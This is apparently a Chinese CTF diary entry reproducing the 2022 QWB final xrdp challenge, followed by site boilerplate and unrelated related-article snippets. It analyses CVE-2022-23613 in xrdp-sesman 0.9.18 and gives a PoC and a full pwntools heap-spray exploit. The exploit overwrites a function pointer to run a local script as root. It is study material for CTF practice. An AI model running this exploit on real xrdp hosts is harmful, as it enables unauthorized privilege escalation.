CTF特训日记day(4-6)

来复现一下2022QWB决赛的RDP题目

这两天腰疼去了趟医院

题目要求我们攻击XRDP程序,从而达到本地提权的效果。
首先观察XRDP程序的版本信息

root@RDP:/home/rdp/Desktop# xrdp-sesman -version
xrdp-sesman 0.9.18The xrdp session managerCopyright (C) 2004-2020 Jay Sorg, Neutrino Labs, and all contributors.See https://github.com/neutrinolabs/xrdp for more information.Configure options:

然后在CVE里搜一下发现有个漏洞版本刚好合适,并且满足题目的提权要求
在这里插入图片描述

从CVE介绍中获得漏洞补丁URL
MISC:https://github.com/neutrinolabs/xrdp/commit/4def30ab8ea445cdc06832a44c3ec40a506a0ffa

可以看到修改的代码行数很少,可以比较容易的分析出漏洞成因
在这里插入图片描述

根据patch信息以及漏洞描述可以判断出漏洞成因是size导致的整型溢出。这里的size会直接赋值给self->header_size。

进入题目虚拟机之后会在RW文件夹下找到一个diff文件

在这里插入图片描述

看上去应该是作者为了方便我们使用漏洞实现提权操作而进行的一个diff

查看一下服务开放的服务
在这里插入图片描述
经分析,做题思路暂时可以确定为通过CVE-2022-23613漏洞配合题目所给出的diff攻击题目开放在3350的xrdp-sesman服务进行本地提权。

接下来在源码中对程序漏洞进行一下简单的分析,在sesman.c中会有一个主循环sesman_main_loop,主循环会创建一个g_list_trans
在这里插入图片描述
其接收连接的函数主要实现在sesman_listen_conn_in中
在这里插入图片描述
最后走到patch中的sesman_data_in

在这里插入图片描述

有一个宏in_uint32_be,在parse.h中有具体展开,就不放了,其实就是从arg1中拿一个int出来给arg2,并让arg1作为int指针加一,这里可以理解成self->in_s指向了程序接收到的用户输入,其中第一个dword作为版本信息给version变量,第二个dword作为headersize给size变量。

在这里由于size是可以自己指定的,所以相当于self->header_size变成了一个用户可控的int类型数据。

在函数trans_check_wait_objs中有此变量的后续应用

if (self->type1 == TRANS_TYPE_LISTENER)/* listening */
{
g_sck_can_recv
g_sck_accept
...
}
else /* connected server or client (2 or 3) */
{if (self->si != 0 && self->si->source[self->my_source] > MAX_SBYTES){}else if (self->trans_can_recv(self, self->sck, 0)){cur_source = XRDP_SOURCE_NONE;if (self->si != 0){cur_source = self->si->cur_source;self->si->cur_source = self->my_source;}read_so_far = (int) (self->in_s->end - self->in_s->data);to_read = self->header_size - read_so_far;if (to_read > 0){read_bytes = self->trans_recv(self, self->in_s->end, to_read);......}read_so_far = (int) (self->in_s->end - self->in_s->data);if (read_so_far == self->header_size){if (self->trans_data_in != 0){rv = self->trans_data_in(self);if (self->no_stream_init_on_data_in == 0){init_stream(self->in_s, 0);}}}
}

程序在此函数中进行了监听和接收数据的处理流程,其中比较值得注意的就是这行代码

to_read = self->header_size - read_so_far;

这里的to_read也为int,并且如果to_read大于零会执行self->trans_recv(self, self->in_s->end, to_read);

这个函数注册与create阶段
在这里插入图片描述
即实际执行的是trans_tcp_recv,追溯到最后就是原生的recv函数,而其缓冲区则是self->in_s,通过init_stream函数分配空间
在这里插入图片描述
分配到的是堆上的空间,而in_size则是在sesman.c中写死的8192
在这里插入图片描述

分析到这里整体漏洞成因已经彻底清楚了,如果我们能控制一个不受任何限制的header_size,将其控制为0x80000000,即一个最小负数,从而绕过header_size不能大于总的输入长度的限制,然后read_so_far作为一个随意的小数,相减以后发生负溢出,header_size将变成一个非常巨大的远超8192的正数,从而导致堆溢出发生。

漏洞分析就到这里,接下来写一个poc调试一下看看是否会触发。

首先看一下xrdp-sesman的pid,然后attach上去,写出poc脚本进行测试,attach的时候断点可以下在trans_check_wait_objs处

测试脚本非常简单

from pwn import *
payload=b'v'*4
payload+=p32(0x80000000)
io=remote("127.0.0.1",3350)
io.send(payload)
io.send('a'*0x1000)


成功断在了函数处
在这里插入图片描述

但是随着调试发现事情不对劲

这里明明应该是0x80000000和0x9,但是变成了0x80和0x9,导致预期的整数负溢出没有发生
在这里插入图片描述

这也就导致到了调用tcp_recv的时候rdx并不是一个非常大的数
在这里插入图片描述

猜测由于网络传输是大端序,所以不能直接p32,于是修改脚本:
在这里插入图片描述

这一次成功将rdx修改为一个超大正整数,发生堆溢出
在这里插入图片描述

有了堆溢出以后,可以试着寻找分配在堆上且有函数指针的结构体,之前分析源码的时候有遇到过一个create函数
在这里插入图片描述

这里不仅输入输出缓冲区是用init_stream分配出来的堆空间,其本身也是g_malloc分配出来的堆空间,上面填充了recv,send等函数,如果能够通过堆溢出将recv函数为程序本身就有的g_execlp3,则相当于可以调用system函数,那么能否控制rdi呢?来看看recv函数具体调用的时候寄存器的状态

在这里插入图片描述

在调用的时候tcp_recv函数位置由rbx进行定位,而rbx和rdi所指向的都当前trans结构体,也就是说只要我们保证结构体中recv函数指针覆盖为exec的同时覆盖结构体的开头为我们想要执行的命令,则可以在下一次使用此trans接收数据的时候执行任意命令。

还剩一个问题,就是堆空间非常复杂,我们能否精准的覆盖到指定的结构体上完成了漏洞利用,这个问题一定程度上来说出题人已经帮我们解决了一大半了,还记得当初的diff吗。将原本为16的MAX_SHORT_LIVED_CONNECTIONS改成了512,这意味着我们可以通过不停创建trans进行堆喷。

通过堆溢出修改堆上的函数指针,并且rdi指向的是结构体头部,所以rdi也可以直接控下,由于我们的任务只是提权,所以可以提前在系统中写入要执行文件,这样在进行漏洞利用的时候只需要执行一条命令即可。

在实际调试的过程中遇到好几处地方需要保证只是是一个可写地址,具体有哪些地址需要额外关照,有两种方式,第一种是通过对程序进行逆向,分析其机构体中有哪些字段需要为可写地址,第二种方式是直接调试,第一次覆盖的时候除了函数指针以外其余所有地方直接用0填充,然后下断点进行调试,就可以看到有些取值指令是执行失败的,遇到取值指令失败的地方就填一个可写地址上去,慢慢调就可以了。

from pwn import *
elf=ELF('./xrdp-sesman')
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
lg = lambda x : print('\033[32m' + str(x) + '\033[0m')
with open("/tmp/do", "w") as f:f.write("#!/bin/bash\necho \"Ayaka\" > /flag")
os.system("chmod a+x /tmp/do")
conn_list=[]
def heap_spray():for i in range(100):io=remote("127.0.0.1",3350)conn_list.append(io)
heap_spray()
bss=0x40a000
input()
system_plt=elf.plt['g_execlp3']
payload=b'v'*4
payload+=p32(0x80000000)[::-1]
io1=conn_list[97]
io1.send(payload)
payload=p64(bss)*(0x4160//8)+p64(0x2b0)+b'/tmp/do\x00'
payload+=p32(1)*2+p64(2)+p64(0)*3+p64(0x400318)+p64(bss)*2+p64(0)*71+p64(0x0000000000403BF0)+p64(0x0000000000403C40)*2
io1.send(payload)conn_list[98].send("a"*8)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/200008.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Diary12-Word表格

Word表格 一.制表符 1.制表 制表:tab键,一个tab键2个空格 2.制表符 使用了tab键之后,所留下来的标记,等同于段落标记 二.制表位与表格 1.制表位 制表位:是指制表符在水平标尺上的位置,指定文字缩进的…

【eNSP实践】eNSP实战篇(2)之简单实现交换机与主机的配置(图文详解)

目录 写在前面涉及知识1、交换机实验1.1 实验条件1.2 实验步骤A、打开eNSP软件,创建拓扑B、搭建主机与交换机连线C、配置交换机和主机D、验证不同网段设备可通性 1.3 通过交换机查看MAC地址 写在最后 写在前面 其实前面文章我有介绍关于路由器的使用,但…

Java多线程技术二:线程间通信——wait/notify机制

1 概述 线程时操作系统中独立的个体,但这些个体如果不经过特殊的处理是不能成为一个整体的。线程间的通信就是使线程成为整体的比用方案之一,可以说,是线程间进行通信后系统之间的交互性会更强大,CPU利用率会得以大幅提高&#xf…

linux 进程间几种常见通信方式介绍

在Linux系统中,进程间通信(Inter-Process Communication,IPC)是指进程之间进行信息交换和共享资源的一种机制。Linux系统提供了多种IPC方式,包括管道、消息队列、信号量、共享内存和套接字等。下面将详细介绍这些IPC方…

Spring Boot项目打包指定包名

在pom.xml文件中的添加<build></build>配置项<finalName>指定包名</finalName>&#xff0c;如想打包的包名叫myApp&#xff0c;添加<finalName>my_server</finalName>即可。 <?xml version"1.0" encoding"UTF-8"…

数据结构基础(不带头节点的单向非循环链表)

单链表完整代码 LinkList.hLinkList.ctest.c LinkList.h #pragma once#include <stdio.h> #include <stdlib.h> #include <assert.h> #include <string.h>typedef int ElemType; typedef struct LNode {ElemType data;struct LNode* next; }LNode;voi…

深入理解Linux =~

一、基本用法 在Linux中&#xff0c;~是用于正则表达式匹配的符号&#xff0c;其基本用法是&#xff1a; [[ $variable ~ pattern ]] 其中$variable是待匹配的字符串&#xff0c;pattern是正则表达式。如果匹配成功&#xff0c;则返回0&#xff0c;否则返回1。 例如&#x…

执法记录仪、一体化布控球等目前支持的AI智能算法、视频智能分析算法有哪些

一、前端设备实现AI算法 主要是基于安卓的布控球实现&#xff0c;已有的算法包括&#xff1a; 1&#xff09;人脸&#xff1b;2&#xff09;车牌&#xff1b;3&#xff09;是否佩戴安全帽&#xff1b;4&#xff09;是否穿着工装&#xff1b; 可以支持定制开发 烟雾&#xf…

使用晶振遇到的两个问题

并联电阻的问题 在一些方案中&#xff0c;晶振并联1MΩ电阻时&#xff0c;程序运行正常&#xff0c;而在没有1MΩ电阻的情况下&#xff0c;程序运行有滞后及无法运行现象发生。 原因分析&#xff1a; 在无源晶振应用方案中&#xff0c;两个外接电容能够微调晶振产生的时钟频率…

【算法思考记录】力扣2477. 到达首都的最少油耗【Java,深度优先搜索】

原题链接 到达首都的最少油耗&#xff1a;一种优雅的解决方案 题目解析 这个算法题目描述了一个有趣的场景&#xff1a;一棵由城市和道路组成的树形结构&#xff0c;其中每个节点代表一个城市&#xff0c;边代表道路。所有城市的代表需要前往编号为0的城市——首都参加会议。…

开放式蓝牙耳机什么品牌好?南卡、韶音、cleer开放式耳机哪个好?

开放式耳机采用不入耳的设计&#xff0c;提供更为舒适的佩戴体验&#xff0c;不会给耳朵带来持续的压力和损害&#xff0c;减轻身体负担。同时&#xff0c;由于无需将耳机插入耳朵内&#xff0c;减少了细菌滋生的可能性&#xff0c;避免了一些耳道健康问题。这些优点也是开放式…

P5 Linux 标准C库函数

目录 前言 01 标准输入、标准输出和标准错误 02 打开文件 fopen() 03 新建文件的权限 04 fclose()关闭文件 05 读文件和写文件 06 库函数 fseek 定位 6.1 lseek的使用 07 ftell()函数 前言 &#x1f3ac; 个人主页&#xff1a;ChenPi &#x1f43b;推荐专栏1: 《C_Chen…

将显存和内存使用降低到原来的1/5左右

llm数据预处理的技巧 1&#xff0c;提前将数据集转为token 2&#xff0c;且可以提前全部对齐 3&#xff0c;存储的时候要每个序列存储为str([1,2,3]) 这样训练的时候再eval出来会让磁盘上显示多大数据内存就占用多大数据 根据上述的思路 如果能够将一个llm 大模型的整个推理过…

Dinky之安装部署与基本使用

Dinky之安装部署与基本使用 Dinky概览Linux安装部署解压到指定目录初始化MySQL数据库修改配置文件加载依赖启动Dinky Docker部署启动dinky-mysql-server镜像启动dinky-standalone-server镜像 Dinky的基本使用上传jar包Flink配置集群管理集群实例管理集群配置管理 创建作业语句编…

打破界限:SQL数据库水平扩展的8大挑战与机遇

数据库扩展是指提升数据库处理更多数据、更多用户或更多交易的能力。通常&#xff0c;SQL数据库采用垂直扩展的方式&#xff0c;即通过增加更多的CPU、内存或存储空间来增强数据库服务器的性能。然而&#xff0c;这种方法受限于单个服务器的硬件能力。 为了克服这一限制&#…

SpringBoot学习笔记-实现微服务:匹配系统(下)

笔记内容转载自 AcWing 的 SpringBoot 框架课讲义&#xff0c;课程链接&#xff1a;AcWing SpringBoot 框架课。 CONTENTS 1. 重构项目1.1 初始化Spring Cloud项目1.2 创建匹配系统框架 2. 实现匹配系统微服务2.1 数据库更新2.2 Web后端与匹配系统后端通信2.3 实现匹配逻辑2.4 …

《形式语言与自动机理论(第4版)》笔记(二)

文章目录 [toc]前导《形式语言与自动机理论&#xff08;第4版&#xff09;》笔记&#xff08;一&#xff09; 第三章&#xff1a;有穷状态自动机3.1|语言的识别3.2|有穷状态自动机即时描述 s e t ( ) set() set()例题问题 1 1 1解答问题 2 2 2解答 3.3|不确定的有穷状态自动机构…

pandas详细笔记

一&#xff1a;什么是Pandas from matplotlib import pyplot import numpy as np import pandas as pdarange np.arange(1, 10, 2) series pd.Series(arange,indexlist("ABCDE")) print(series)二&#xff1a;索引 三&#xff1a;切片 位置索引切片&#xff08;左闭…

.mallox勒索病毒解密:恢复数据与网络安全对策

引言&#xff1a; 在网络威胁不断演变的今天&#xff0c;恶意软件如.mallox勒索病毒已成为数字安全的一大挑战。本文将深入介绍.mallox勒索病毒&#xff0c;以及如何有效地恢复被其加密的数据文件&#xff0c;并提供一些建议用于预防此类威胁。如不幸感染这个勒索病毒&#xf…

【数据结构(七)】查找算法

文章目录 查找算法介绍1. 线性查找算法2. 二分查找算法2.1. 思路分析2.2. 代码实现2.3. 功能拓展 3. 插值查找算法3.1. 前言3.2. 相关概念3.3. 实例应用 4. 斐波那契(黄金分割法)查找算法4.1. 斐波那契(黄金分割法)原理4.2. 实例应用 查找算法介绍 在 java 中&#xff0c;我们…